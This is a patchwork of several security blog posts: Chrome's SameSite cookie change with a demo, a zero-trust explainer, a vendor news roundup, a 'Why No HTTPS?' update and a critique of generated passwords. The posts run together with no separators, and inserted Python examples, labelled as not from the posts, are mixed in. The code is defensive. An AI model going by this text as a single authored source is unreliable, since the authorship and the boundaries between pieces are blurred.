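    guessed = accept_change_password("POST", browser_cookies, {**fields, TOKEN_NAME: "0" * 64})
    return {"legit": legit, "forged": forged, "guessed": guessed}


if __name__ == "__main__":
    print(demo())  # {'legit': True, 'forged': False, 'guessed': False}
```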

This, frankly, is a mess. Whilst it's relatively easy to implement via frameworks such as ASP.NET, it leaves you wondering - do cookies really need to be that promiscuous? Do they need to accompany every single request regardless of the origin? No, they don't, which is why if you look in Chrome's dev tools on this very blog at the time of writing, you'll see the following:

The "future release of Chrome" is version 80 and it's scheduled to land on the 4th of Feb which is rapidly approaching. Which brings us to the SameSite cookies mentioned in the console warning above. In a nutshell, they boil down to 3 different ways of handling cookies based on the value set:

  1. None: what Chrome defaults to today without a SameSite value set
  2. Lax: some limits on sending cookies on a cross-origin request
  3. Strict: tight limits on sending cookies on a cross-origin request

Come version 80, any cookie without a SameSite attribute will be treated as "Lax" by Chrome. This is really important to understand because put simply, it'll very likely break a bunch of stuff. In order to demonstrate that, I've set up a little demo site to show how "Lax" and "Strict" SameSite cookies behave alongside the traditional ones with no policy at all. I'm going to do this with an "origin" site (the one that sets the cookies in the first place) and an "external" site (one which links to or embeds content from the origin site). Let's begin by visiting the origin site at http://originsite.azurewebsites.net/setcookies/

That's intentionally loaded over the insecure scheme for reasons that will become apparent later. It sets a bunch of cookies which can then be read at http://originsite.azurewebsites.net/readcookies/

I'm showing the Chrome dev tools here as they make it easy to see the SameSite value that's been set for each cookie (if set at all). These have been given self-explanatory names so no need to delve into them here. The main thing is that the site setting the cookies can read them all. But that's not what SameSite is all about, let's make it interesting and load up http://externalsite.azurewebsites.net/

There are 4 different things I want to demonstrate here as each implements a slightly different behaviour. Let's begin by clicking the GET request button:

This loads the origin website with the GET verb and passes through all existing cookies except for the "Strict" one. Going back to the purpose of this blog post, once Chrome starts defaulting cookies without a SameSite policy to "Lax", GET requests will still send them through.

Next up, let's try the POST request:

And this is where things start to get interesting as neither the "Strict" nor "Lax" cookies have been sent with the request. The default cookies with no SameSite policy have, but only because I'm running Chrome 79. Come next month when Chrome 80 hits, the image above will no longer show the default cookie. By extension, any websites you're responsible for that are passing cookies around cross domain by POST request and don't already have a SameSite policy are going to start misbehaving pretty quickly.

Next up is the iframe:

You can see how the source of the frame is the origin website and embedding it like this will make a GET request, but even the "Lax" cookie hasn't been passed. This is really important to understand: not all resource types behave the same way even when the same verb is used.

The last one is the cookie image and it's easiest just to look at the request in the dev tools for this one:

As with the iframe, it's only the cookies with no SameSite policy that are sent either because it's explicitly set to "None" or because no policy has been set at all. But as with the iframe and the POST request, the default cookie shortly won't be sent at all and again, that's where the gotcha is going to hit next month.

Now, there are two more nuances to all this, the first of which is detailed on Chrome's Platform Status page:

Chrome will make an exception for cookies set without a SameSite attribute less than 2 minutes ago. Such cookies will also be sent with non-idempotent (e.g. POST) top-level cross-site requests despite normal SameSite=Lax cookies requiring top-level cross-site requests to have a safe (e.g. GET) HTTP method. Support for this intervention ("Lax + POST") will be removed in the future.

Given that last sentence, it's probably not something you want to be relying on though.

The second nuance relates to cookies with a "None" policy that are served insecurely:

Deprecate and remove the use of cookies with the SameSite=None attribute but without the Secure attribute. Any cookie that requests SameSite=None but is not marked Secure will be rejected.

As a massive HTTPS proponent, this makes me happy 😊 To demonstrate this behaviour, I've added an additional "None" cookie but flagged it as secure. As such, the cookie will only stick after being loaded over an HTTPS connection so give this a go: https://originsite.azurewebsites.net/setcookies/

That results in the following cookies coming back in the response, the highlighted one being the new one:

Now try loading the secure version of the external site at https://externalsite.azurewebsites.net/

Both the highlighted cookies will die as of Chrome 80: The "None" cookie because whilst it has a SameSite policy, it's not flagged as "Secure" and the default cookie because it will inherit the behaviour of a "Lax" cookie which will no longer be loaded into an iframe.
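To make the demo behaviour concrete, here is an added Python model (my own, not part of the post and not Chrome's code) of the rule that decides whether a cookie is attached to a cross-site request under Chrome 79 versus Chrome 80, including the two nuances quoted above: unset cookies treated as "Lax" (with the 2-minute "Lax + POST" intervention) and "None" without "Secure" rejected. The cookie names mirror the demo site; the model assumes the request goes to the https origin so "Secure" cookies are eligible, and it only covers cross-site requests.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Dict, List


class SameSite(Enum):
    UNSET = "unset"    # Set-Cookie carried no SameSite attribute at all
    NONE = "None"
    LAX = "Lax"
    STRICT = "Strict"


@dataclass
class Cookie:
    name: str
    same_site: SameSite = SameSite.UNSET
    secure: bool = False
    age_seconds: float = 3600.0   # how long ago it was set; matters for "Lax + POST"


@dataclass
class CrossSiteRequest:
    method: str        # "GET" or "POST"
    top_level: bool    # True for a navigation (link click, form submit), False for iframe/img


SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}
LAX_PLUS_POST_WINDOW = 120.0   # seconds, per the Platform Status note


def cookie_is_sent(cookie: Cookie, request: CrossSiteRequest, chrome80: bool) -> bool:
    """Decide whether the browser attaches `cookie` to a cross-site request.

    chrome80=False models Chrome 79 (no attribute == "None").
    chrome80=True models Chrome 80: no attribute == "Lax" with the temporary
    "Lax + POST" exception, and "None" without "Secure" is rejected outright.
    """
    policy = cookie.same_site
    lax_plus_post = False
    if policy is SameSite.UNSET:
        if chrome80:
            policy = SameSite.LAX
            lax_plus_post = cookie.age_seconds < LAX_PLUS_POST_WINDOW
        else:
            policy = SameSite.NONE

    if policy is SameSite.NONE:
        if chrome80 and not cookie.secure:
            return False   # rejected when set, so it is never there to send
        return True
    if policy is SameSite.STRICT:
        return False       # never sent cross-site

    # "Lax": only top-level navigations with a safe method, plus the
    # short-lived exception for fresh cookies without an explicit attribute.
    if not request.top_level:
        return False       # iframe and image loads are not top-level
    if request.method.upper() in SAFE_METHODS:
        return True
    return lax_plus_post


# The cookies set by the demo origin site (names constructed to match their policy).
DEMO_COOKIES: List[Cookie] = [
    Cookie("default"),
    Cookie("none_insecure", SameSite.NONE),
    Cookie("none_secure", SameSite.NONE, secure=True),
    Cookie("lax", SameSite.LAX),
    Cookie("strict", SameSite.STRICT),
]

# The four buttons on the external site.
DEMO_REQUESTS: Dict[str, CrossSiteRequest] = {
    "get_link": CrossSiteRequest("GET", top_level=True),
    "post_form": CrossSiteRequest("POST", top_level=True),
    "iframe": CrossSiteRequest("GET", top_level=False),
    "image": CrossSiteRequest("GET", top_level=False),
}


def sent_cookies(chrome80: bool, cookies: List[Cookie] = DEMO_COOKIES,
                 requests: Dict[str, CrossSiteRequest] = DEMO_REQUESTS) -> Dict[str, List[str]]:
    """Which demo cookies each request type carries under the given browser rules."""
    return {label: [c.name for c in cookies if cookie_is_sent(c, req, chrome80)]
            for label, req in requests.items()}


if __name__ == "__main__":
    for version, flag in (("Chrome 79", False), ("Chrome 80", True)):
        print(version)
        for label, names in sent_cookies(flag).items():
            print(f"  {label:9s} -> {names}")
```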

Want to try it all out? You can toggle these features in Chrome today by first changing the default behaviour for cookies without a SameSite policy at chrome://flags/#same-site-by-default-cookies

And then requiring that they be secure at chrome://flags/#cookies-without-same-site-must-be-secure

Now let's try loading that last page again:

This change has the potential to break a lot of stuff so if you're in an environment where you're explicitly disabling the SameSite policy with "None" and still making insecure requests (*cough* enterprise), times are about to get interesting. Or if you're Google's own tracking service:

This popped up on my blog as soon as I changed Chrome's default behaviour to reflect what's coming next month (it's subtly different to the one earlier in this blog post) so it's a good example of the sorts of things you can proactively pick up now. If you do see this sort of thing in the enterprise, Chrome's changed behaviour can also be reverted across the organisation:

Enterprise IT administrators may need to implement special policies to temporarily revert Chrome Browser to legacy behavior if some services such as single sign-on or internal applications are not ready for the February launch.

As an example of the sort of stuff this change impacts, Microsoft have said it breaks OpenIdConnect logins which is definitely something you want to be aware of in advance. If you're living in a Microsoft world, as of .NET 4.7.2 there's now a SameSite enum on cookies to help make configuring your apps a little easier:

(Quick note on Microsoft's implementation: their first shot at it was buggy and caused the "None" policy to omit the SameSite cookie attribute altogether which, as you're now aware, would cause issues come Chrome 80. It's since been fixed in the latest framework releases but as of the time of writing, hasn't been pushed to the Azure App Service. I've just finished a rather frustrating debugging process which culminated in manually sending a "Set-Cookie" header to make the demo app behave as I wanted it to.)

This changed cookie behaviour looks like it's going to stick and extend well beyond just Chrome. There's an IETF draft for Incrementally Better Cookies specifying "Lax" by default and requiring "Secure" on all "None" cookies and Mozilla have an intent to implement the same behaviour in Firefox (note that back in May they were targeting V69 but as of V71 which is current today, it's not yet implemented).

So that's the SameSite cookie story. It's a good move by Chrome IMHO as it takes us towards a more "secure by default" position but as with many changes that favour security, it'll also break some stuff along the way. The fix is easy, all it needs is for everyone responsible for maintaining any system that uses cookies that might be passed from an external origin to understand what's going on. Can't be that hard, right? Hello? Oh...

Security resolutions for 2020 to stay safe online!

As we are about to enter the new year, it’s ritualistic to reflect on our experiences from the passing year and make resolutions for the New Year. Most people make resolutions around good health, their life goals, etc. Here is a different angle to our routine resolutions list – Security…

The 3 W’s in Zero Trust Security

Picture this scenario: you are a security guard at an office building. Today you are looking after a restricted area. A person you’ve never seen before walks straight past you into one of the rooms. Would you stop them or would you just assume they are allowed to be there?

In a physical world, trust is most commonly based on who you are, not where you are. A savvy security guard would ask you for your ID before allowing you in. Virtually, though, the situation is different: being in the right place is often enough. If you are inside of a company’s network perimeter, it is often assumed you have the right to be there. You gain access to the same data and tools that any other trusted user would. It’s clear that such an approach is no longer enough.

Zero trust security comes in as an alternative model, more in line with the current threat landscape. It is based on the principle of “always check, never trust”, originally introduced by Forrester. It takes into account 3 main factors:

  • Workforce: Employees are at risk of identity theft, which is one of the most widespread types of fraud today.
  • Workload: New vulnerabilities in applications and their improper management open highways for cybercriminals.
  • Workplace: With more and more connected devices, the workspace has extended far beyond the four walls of your company building.

Moving from a perimeter model to Zero Trust means assessing, adapting and implementing new security policies that address threats in a constantly changing environment. In this trust-centric approach access is granted to users and devices, not a network.

What's different in a Zero-Trust Approach

This means that policies now need to be calculated based on a vast number of data sources. All network activities must be continuously taken into account. Any indications of compromise or changes in the behaviour of apps, users and devices must be examined, validated and receive immediate responses.

How to apply a Zero Trust model

Cisco’s practical approach to Zero Trust includes six important steps.

  1. Establish levels of trust for users and user devices (identity verification with multi-factor authentication and device status, which must be compliant and properly updated)
  2. Establish levels of reliability for IoT and/or workloads (profile and baseline)
  3. Establish SD perimeters to control access to the application (authorised access)
  4. Establish SD perimeters to control access to the network (segmentation and micro-segmentation)
  5. Automate the adaptive policy using normalisation (network, data centre and cloud)
  6. Automate the adaptive policy using the response to threats (adapt the level of trust)

Cisco Zero-Trust Model: Duo for Workforce, SD-Access for workplace and Tetration for Workload

Zero Trust Security involves people, processes and technology in its adoption. It can provide a roadmap for a truly efficient and automated security infrastructure.

Join us at Cisco CISO Day in Barcelona

We will cover zero trust security and other strategic topics at the “Cisco CISO Day“, an exclusive event for CISOs, taking place on 27 January 2020 in Barcelona at the Cisco Co-Innovation Center. It is a great opportunity to talk with colleagues and experts and find concrete answers to any burning security questions.

Register for Cisco CISO Day

The post The 3 W’s in Zero Trust Security appeared first on Cisco Blogs.

This Week in Security News: Microsoft vs. Amazon in the Cloud and Escalated Risk in the Oil and Gas Industry

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about cybersecurity risk facing the oil and gas industry and its supply chain. Also, read about what Trend Micro’s CEO, Eva Chen, has to say about Microsoft and Amazon’s battle for cloud leadership.

Read on:

How to Get the Most Out of Industry Analyst Reports

In this video blog, Trend Micro’s Vice President of Cybersecurity, Greg Young, taps into his past experience at Gartner to explain how to discern the most value from industry analysts and help customers understand how to use the information.

Top Gun 51 Profile: Trend Micro’s Jeff Van Natter Sees Distributors as Key to Reaching New Partners

In an interview with Channel Futures, Trend Micro’s Jeff Van Natter explains why he believes distributors will continue to play an important role for Trend as it looks to expand its partner ecosystem.

How to Speed Up a Slow PC Running Windows OS

The first step to improving your Windows PC performance is to determine what’s causing it to run slow. In this blog, learn about eight tips on how to fix a slow PC running Windows and how to boost your PC’s performance.

We Asked 13 Software Execs Whether Microsoft Can Topple Amazon in the Cloud, and They Say There’s a Chance but It’ll Be a Hard Battle

Business Insider talked to 13 executives at companies that partner with Microsoft and Amazon on cloud platforms for their take on the rivalry between the two, and whether Microsoft can win. In this article, read about what Trend Micro CEO Eva Chen has to say about the rivalry.

DDoS Attacks and IoT Exploits: New Activity from Momentum Botnet

Trend Micro recently found notable malware activity affecting devices running Linux. Further analysis of the malware samples revealed that these actions were connected to a botnet called Momentum, which has been used to compromise devices and perform distributed denial-of-service (DDoS) attacks.

Oil and Gas Industry Risks Escalate, Cybersecurity Should Be Prioritized

The oil and gas industry and its supply chain face increased cybersecurity risks from advanced threat groups and others as they continue to build out digitally connected infrastructure, Trend Micro research reveals.

Christmas-Themed Shopping, Game and Chat Apps Found Malicious, Lure Users with Deals

Security researchers caution Android users when downloading apps for shopping, games, and Santa video chats as they found hundreds of malicious apps likely leveraging the season to defraud unwitting victims via command-and-control (C&C) attacks, adware or “excessive or dangerous combinations of permissions,” such as camera, microphone, contacts and text messages.

New Orleans Mayor Declares State of Emergency in Wake of City Cyberattack

New Orleans Mayor LaToya Cantrell declared a state of emergency last Friday after the city was hit by a cyberattack where phishing attempts were detected. Cantrell said the attack is similar to the July 2019 attack on the state level where several school systems in Louisiana were attacked by malware.

Credential Harvesting Campaign Targets Government Procurement Sites Worldwide

Cybersecurity company Anomali uncovered a campaign that used 62 domains and around 122 phishing sites in its operations and targeted government procurement services in 12 countries, including the United States, Canada, Japan, and Poland.

Schneider Electric Patches Vulnerabilities in its EcoStruxure SCADA Software and Modicon PLCs

Schneider Electric released several advisories on vulnerabilities they have recently fixed in their EcoStruxure and Modicon products. Modicon M580, M340, Quantum and Premium programmable logic controllers (PLCs) were affected by three denial of service (DoS) vulnerabilities.

FBot aka Satori is Back with New Peculiar Obfuscation, Brute-force Techniques

Trend Micro recently observed that the Mirai-variant FBot, also known as Satori, has resurfaced. Analysis revealed that this malware uses a peculiar combination of XOR encryption and a simple substitution cipher, which has not been previously used by other IoT malware variants. Additionally, the credentials are not located within the executable binary — instead, they are received from a command-and-control (C&C) server.

15 Cyber Threat Predictions for 2020

As 2020 nears, this article outlines the cyber threats that Trend Micro’s research team predicts will target organizations in the coming year, and why.

Negasteal/Agent Tesla Now Gets Delivered via Removable Drives, Steals Credentials from Becky! Internet Mail

Trend Micro recently spotted a Negasteal/Agent Tesla variant that uses a new delivery vector: removable drives. The malware also now steals credentials from the applications FTPGetter and Becky! Internet Mail.

Into the Battlefield: A Security Guide to IoT Botnets

The internet of things (IoT) has revolutionized familiar spaces by making them smarter. Homes, offices and cities are just some of the places where IoT devices have given better visibility, security and control. However, these conveniences have come at a cost: traditional cyberthreats also found a new arena for attacks and gave rise to realities like IoT botnets.

What’s your take on whether or not Microsoft can topple Amazon in the cloud? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

Still Why No HTTPS?

Back in July last year, Scott Helme and I shipped a little pet project that tracked the world's largest websites not implementing HTTPS by default. We called it Why No HTTPS? and it gave people a way to see the largest websites not taking transport layer security seriously. We also broke the list down on a country-by-country basis and it quickly became a means of highlighting security gaps and serving as a "list of shame". I've had many organisations reach out and ask to be removed once they'd done their TLS things properly so clearly, the site is driving the right behaviour. Today, we're happy to share the first update since November last year.

The Web is More Secure More of the Time

Let's start with the good news: since the first release of this little project, HTTPS adoption has steadily trended upwards:

We've gone from 70% of all HTTP requests being over the secure scheme to 80% which is a pretty good effort in a relatively short amount of time. But, of course, it's the websites serving that remaining 20% of traffic that I want to focus on here. Let's begin with where we source the list of top sites from and that's something we've changed for this release.

Bye Bye Alexa, Hello Tranco

When we launched the site, the list was based on the Alexa Top 1M. However, this list was becoming somewhat tricky to use reliably as Scott explained in October:

I used to use the Alexa Top 1 Million for this research but I've been having issues with the list. They tried to remove access at one point and while I managed to have it restored, there are other issues too. The accuracy of the data has been called into question and also the list itself has been having weird issues recently like not returning 1 million entries... Yep, that's right, the Alexa Top 1 Million list has been returning, in some cases, only ~650,000 entries recently, which is of course a problem.

Consequently, there are some differences in the way sites are ranked and as a result, there are some unexpected appearances. For example, the 21st largest site on the global list is googletagmanager.com. Now obviously this isn't a website in the sense that folks go there looking for useful content (many would argue quite the contrary), but based on the Tranco data it's one of the most traffic'd websites in the world so it's within scope of this project.

So that's our starting point in terms of identifying which sites we assess, let's move onto the methodology around how a site ultimately makes our list.

Methodology and False-Positives

A quick recap on our methodology first: Scott runs a service which indexes a whole bunch of security things on the world's top million websites each day. He publishes the results of that effort via his free crawler.ninja website (really Scott, .ninja?!) and I then roll the HTTP sites and HTTPS sites list into the Why No HTTPS? website. In that regard, it's quite simple. Except it's not really...

As I explained in this Q&A blog post last year, there are a whole bunch of reasons why a site that you see apparently doing things right might still be on our list. If you're going to chime in here with a bit of "But [blah].com loads over HTTPS by default for me", do please start by reading that blog post.

Read the post? Good! What we're left with pretty much boils down to an expectation that a site responds to an HTTP request over the insecure scheme with either a 301 or 302 (ideally the former so it's a permanent redirect) to a secure URL (multi-hop is also ok: a 301 to an HTTP address that then 301s to an HTTPS address is fine). If I make an insecure curl request from here in Australia, for example, and I get an HTTP 401 then the site goes onto the list. There has been some dissatisfaction over this methodology due to how much website behaviour can vary from location to location, so in this update we've added a means of getting a "free pass" that will automatically exclude a site from the list.

HSTS Preload Gives You an Immediate "Free Pass"

Preloaded HSTS is awesome (here's an old blog post that explains why). Once a site is pinned into the browser's static list of HSTS sites, insecure requests will always be upgraded and the 301 / 302 done by the website becomes redundant. Further, check out the requirements to be preloaded in the first place, in particular, this one:

Redirect from HTTP to HTTPS on the same host, if you are listening on port 80.

What this means is that if a site is in the preload list, we're comfortable excluding it from our list of shame. A great example of this is the domain I mentioned earlier - googletagmanager.com. When I curl that address insecurely, here's what happens:

Arguably, this should keep the site in scope of being on our list but because it's been successfully preloaded and the browser simply won't allow an insecure request, it gets a free pass. Other notable "free pass" sites include hyatt.com (a curl for me just 301s to a www prefixed address served insecurely) and... haveibeenpwned.com:

Over many years I've carefully honed a bunch of Cloudflare firewall rules to identify non-browser traffic that doesn't adhere to expected norms. The response above serves a body containing anti-automation (CAPTCHA) over the same scheme the request was made to (a Cloudflare behaviour). You shouldn't ever get that response in an actual browser but if you did, the fact that HSTS has been preloaded for the domain for years means the request would automatically be upgraded hence HIBP is really a false positive.

This practice of giving HSTS preloaded sites a free pass is something we hope will drive more websites in this direction. The next time someone reaches out and claims their site is incorrectly categorised that's going to be my first response - preload your domain then the next update to the site will keep you excluded.
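As an added example of the methodology in the last two sections (my own code, not the Why No HTTPS? project's), here is a Python classifier that takes the redirect chain observed for an insecure request plus a preload set and decides whether a domain lands on the list: 301/302 hops are followed (multi-hop allowed) until an https:// Location appears, anything else such as a 200 body or a 401 puts the site on the list, and a preloaded domain gets the free pass. The chains and preload entries are constructed; walking up to parent domains for the preload check assumes the entry covers subdomains, which preloading requires via includeSubDomains.

```python
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlsplit

# One observed hop: (HTTP status, Location header or None) when curling over http://.
Hop = Tuple[int, Optional[str]]

MAX_HOPS = 5   # guard against redirect loops that never reach https


def reaches_https(chain: List[Hop], max_hops: int = MAX_HOPS) -> bool:
    """True if an insecure request ends up redirected to an https:// URL.

    Accepts 301 or 302 at each hop and allows multi-hop (http -> http -> https).
    Anything else (200 served insecurely, a 401 challenge, an http loop) fails.
    """
    for status, location in chain[:max_hops]:
        if status not in (301, 302) or not location:
            return False
        scheme = urlsplit(location).scheme.lower()
        if scheme == "https":
            return True
        if scheme not in ("", "http"):   # "" is a relative Location, still plain http
            return False
    return False   # ran out of hops without reaching https


def is_preloaded(domain: str, preload: Set[str]) -> bool:
    """Free pass check: the domain or one of its parents is in the preload set.

    Assumption: entries cover subdomains, as preloading requires includeSubDomains.
    The bare TLD is never checked.
    """
    labels = domain.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in preload for i in range(len(labels) - 1))


def on_list(domain: str, chain: List[Hop], preload: Set[str]) -> bool:
    """Decide whether a domain goes onto the Why No HTTPS? list."""
    if is_preloaded(domain, preload):
        return False   # the browser upgrades the request anyway, so the 301/302 is moot
    return not reaches_https(chain)


# Constructed observations covering the cases the methodology distinguishes.
SAMPLE_CHAINS: Dict[str, List[Hop]] = {
    "direct.example":        [(301, "https://direct.example/")],
    "multihop.example":      [(301, "http://www.multihop.example/"),
                              (301, "https://www.multihop.example/")],
    "relative.example":      [(302, "/home"), (301, "https://relative.example/home")],
    "plain.example":         [(200, None)],                    # body served over http
    "challenge.example":     [(401, None)],                    # anti-automation challenge
    "loop.example":          [(302, "http://loop.example/")] * 6,
    "preloaded.example":     [(200, None)],                    # insecure to curl, but preloaded
    "www.preloaded.example": [(401, None)],                    # covered by the parent's entry
}
PRELOAD: Set[str] = {"preloaded.example"}   # constructed stand-in for the HSTS preload list


def classify(chains: Dict[str, List[Hop]] = SAMPLE_CHAINS,
             preload: Set[str] = PRELOAD) -> Dict[str, List[str]]:
    """Split the sample domains into those that make the list and those excluded."""
    listed = sorted(d for d, c in chains.items() if on_list(d, c, preload))
    excluded = sorted(d for d in chains if d not in listed)
    return {"listed": listed, "excluded": excluded}


if __name__ == "__main__":
    for group, domains in classify().items():
        print(group, domains)
```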

Check the Diffs on GitHub

Lastly, if you'd like to see exactly what's changed in the data set, check out the public GitHub repository. You'll see all the input data and all the output data, the latter being precisely the files that drive the Why No HTTPS? website. I personally find it interesting to look at diffs on files such as the top50-au.json one as it gives me a really good sense of what's changed. I've ordered these files by domain name rather than rank to make things a little easier, but of course with ranks regularly changing anyway, plus the move from Alexa to Tranco, there's going to be a heap of changes from last time even if the HTTPS status hasn't changed. At the very least though, it makes it super easy to see which sites have now dropped off the list altogether.

Comments Below

There's always a bunch of feedback on these releases and people often find really interesting things in the data. Do chime in below, keeping in mind the earlier point about reading the Q&A blog post first. And, of course, please continue to use this site as leverage to move more organisations in the "secure by default" direction.

Generated Passwords, UX and Security Absolutism

Last month, Disney launched their new streaming service Disney+; "The best stories in the world, all in one place", apparently. The service was obviously rather popular because within days the tech (and mainstream) headlines were proclaiming that thousands of hacked Disney+ accounts were already for sale on hacking forums. This is becoming an alarmingly regular pattern with online services, the cause of which was soon confirmed by Disney:

Disney says that there is “no indication” of a security breach on Disney+, and that the source of the problem might be a so-called “credential stuffing” attack, in which hackers obtain passwords and usernames from Dark Web databases, and then use a brute force method to see if those passwords and usernames will work on new sites as well.

So the root cause is credential reuse. We've all done it at some time or other and the vast, vast majority of online users still do it today. But what if we could stop this attack dead in its tracks? What if one simple design decision in the auth process could completely rule out any chance of ever suffering a credential stuffing attack?

Genius! Absolute genius! So why doesn't every site take away the ability for people to choose their own passwords? Why not just generate the password for them thus completely eradicating password reuse? Because it's an absolutely terrible idea, which brings me to the catalyst for this blog post:

I woke up earlier this week to a flood of tweets pointing me at this one with people aghast at the premise of firstly, storing passwords in plain text and secondly, emailing them out to people:

This is largely a practice of a bygone era and it's increasingly rare to see in modern times (and if you do see it, name and shame over at Plain Text Offenders). But how relevant is this criticism when the passwords are system-generated? Whilst the storage and delivery of the password in plain text certainly smells bad, when it's a (pseudo) random string, the risk is very different to when the user chooses their own secret:

For me, the issue isn't really about the storage and delivery of the password, it's about the practice of generating a password for someone that just doesn't add up. There's a fundamental flaw in the logic which I summarised as follows:

The tweet I quoted linked to a blog post titled Pentesting Training Website Challenges Authentication Best Practices and referenced the infosec community doing much "pitchfork raising". Somehow, despite my joining the conversation late, my single-word tweet featured at the beginning of that post which concluded that:

Practical Pentest Labs makes a great case for innovation and not following the pack in the IT security landscape.

So let's go through the registration process and look at why "the pack" doesn't implement things this way. Registration involves entering a username and email address which then delivers the following to your inbox:


Now, put yourself in the shoes of someone who's just registered - how do you log in? Copy and paste the password of course, that's the easy bit. But how do you log in next time? Clearly, you're not going to remember the password so you need to record it somewhere, but where? Password manager? Great, which means you also have the ability to do something like this on account creation:


This is 1Password's password generator and I use it for every new account I create so clearly there's no "uniqueness" value to assigning the user a password when you can generate your own strong password anyway. And if you have no password manager? You're not going to write it down because that would be absolutely painful, as would re-typing it on return to the website. In all likelihood you're simply not going to record the password at all which means then doing a password reset. Except it's not a reset, it's a recovery which is why they store it in plain text in the first place:

Now of course there are very well-established patterns for implementing a password reset so this remains a really odd design decision, but it's one that's tangential to the discussion around generating the password. Using the "forgot password" feature as a primary means of authentication was enthusiastically supported by a number of people who joined in on the conversation:
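The well-established reset pattern referred to above, as an added example that is not code from the original post or from Practical Pentest Labs: a system-generated password is stored only as a salted hash, so there is nothing to "recover", and "forgot password" mints a single-use, time-limited token whose hash (not the token) is stored. PBKDF2-HMAC-SHA256, the round count, the 15-minute token lifetime, the in-memory dictionaries standing in for database tables and the injected clock are all assumptions of the example.

```python
import hashlib
import hmac
import secrets
import string
import time

# Assumptions of this example: PBKDF2-HMAC-SHA256 as the password hash
# (rounds kept low so the example runs quickly; use far more in production)
# and a 15-minute lifetime for reset tokens.
PBKDF2_ROUNDS = 50_000
RESET_TOKEN_TTL = 15 * 60  # seconds
ALPHABET = string.ascii_letters + string.digits


def generate_password(length: int = 20) -> str:
    """System-generated password from a CSPRNG, shown to the user once."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def hash_password(password: str, salt=None) -> tuple:
    """Return (salt, digest); the digest is all that is ever stored."""
    if salt is None:
        salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class AccountStore:
    """In-memory stand-in for the user and reset-token tables."""

    def __init__(self, clock=time.time):
        self.clock = clock   # injected so token expiry can be exercised offline
        self.users = {}      # username -> {"salt": bytes, "hash": bytes}
        self.resets = {}     # sha256(token) -> {"username", "expires"}

    def register(self, username: str) -> str:
        # The generated password is returned for one-time delivery; only its
        # salted hash is kept, so there is nothing to "recover" later.
        password = generate_password()
        salt, digest = hash_password(password)
        self.users[username] = {"salt": salt, "hash": digest}
        return password

    def verify(self, username: str, password: str) -> bool:
        rec = self.users.get(username)
        if rec is None:
            # Burn the same work for unknown users so response timing does
            # not reveal whether the account exists.
            hash_password(password, b"\x00" * 16)
            return False
        _, digest = hash_password(password, rec["salt"])
        return hmac.compare_digest(digest, rec["hash"])

    def request_reset(self, username: str):
        """Mint a single-use, time-limited token to be e-mailed as a link.
        Only its hash is stored; the caller shows the same message whether
        or not the account exists."""
        if username not in self.users:
            return None
        token = secrets.token_urlsafe(32)
        key = hashlib.sha256(token.encode()).digest()
        self.resets[key] = {"username": username,
                            "expires": self.clock() + RESET_TOKEN_TTL}
        return token

    def complete_reset(self, token: str, new_password: str) -> bool:
        """Consume the token (pop makes it single-use) and store a new hash."""
        key = hashlib.sha256(token.encode()).digest()
        rec = self.resets.pop(key, None)
        if rec is None or rec["expires"] < self.clock():
            return False
        salt, digest = hash_password(new_password)
        self.users[rec["username"]] = {"salt": salt, "hash": digest}
        return True


if __name__ == "__main__":
    store = AccountStore()
    pw = store.register("alice")
    print("generated once:", pw, "login ok:", store.verify("alice", pw))
    token = store.request_reset("alice")
    print("reset ok:", store.complete_reset(token, "user-chosen-passphrase"))
    print("token reusable:", store.complete_reset(token, "again"))
```

The point of the design is that neither a database dump nor an intercepted e-mail gives an attacker a reusable secret: the password is hashed the moment it is generated, and a reset link is only good once and only for a short window.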

Let's be clear about the first bit: using this feature as a means of recovering access to an account isn't "genius" due to their decision to generate passwords because you can use exactly the same approach with any site that allows you to choose your own password. This is simply using the password reset feature for auth, pure and simple. And it has a heap of issues.

Firstly, it always involves more steps and more time than entering a username and password either from memory or password manager. It's no longer a matter of entering a username and password, it's enter the email address, wait for the email, go to the mail client, click the link, now you're in.

Secondly, "wait for the email" can be a protracted process. We've all had plenty of occasions where mail delivery is delayed and, in this case, that's a blocking process; you simply cannot log back in until the mail comes.

Thirdly, there's junk. Just this morning I discovered all my Disqus notifications were going direct to the spam box:


I don't know if that's Disqus' fault or Office 365's fault, but what I do know is that a whole bunch of legitimate emails were no longer being delivered to my inbox (it wasn't just Disqus either). Now imagine you're dependent on that email simply to access a system you're already registered on - it's painful. Of course, you still need successful email delivery for registration verification and the times you genuinely need to perform an account recovery, but making that a dependency on every single authentication attempt is just nonsensical.

Much of the discussion had on this topic centred around the pain imposed on users choosing passwords:

You can argue this two different ways: On the one hand, manually creating a password that meets what is often arbitrary complexity criteria can be painful, and that's before you even begin listening to that nagging voice in the back of your head saying "also make it unique". On the other hand, passwords are one of the simplest security constructs we have and every single person using the web today understands how to use them. Indeed, this is what keeps human-chosen passwords alive today; just last year I wrote Here's Why [Insert Thing Here] Is Not a Password Killer, where I explained that despite the technical merits of alternate approaches, the simple reason we still use passwords the way we do today is because everyone understands them! It's exactly the same reason why I ended up standing in front of US Congress testifying about the impact of data breaches on knowledge based authentication; relaying your date of birth as a means of verifying your identity is terrible in terms of security, but it prevails because every single person knows how to do it! You cannot escape these basic security truths and time and time again, usability trumps security.

Which brings me to the "security absolutism" term in the title of this post. Security absolutism - the view that all else is secondary to this one strongly held principle - was rampant throughout the discussion:

This feels like a very sage, grandfatherly thing for me to say, but this is simply not how the world works. If it was, they'd force 2FA on every single user and demand they purchase a U2F key for auth. As it stands, there's not even a self-service means of changing your password:

If security was such an important focus, they wouldn't still be supporting TLS 1.0 and 1.1 (SSL Labs will cap their grade to "B" in a few weeks from now for that faux pas), they'd use DNS CAA and they wouldn't be scoring a failing "F" grade on Security Headers due to no HSTS and no CSP. To be clear, none of these are particularly sensational findings, but the assertion that security is somehow sacrosanct and that everything else must be sacrificed in its pursuit is clearly not what's going on here.

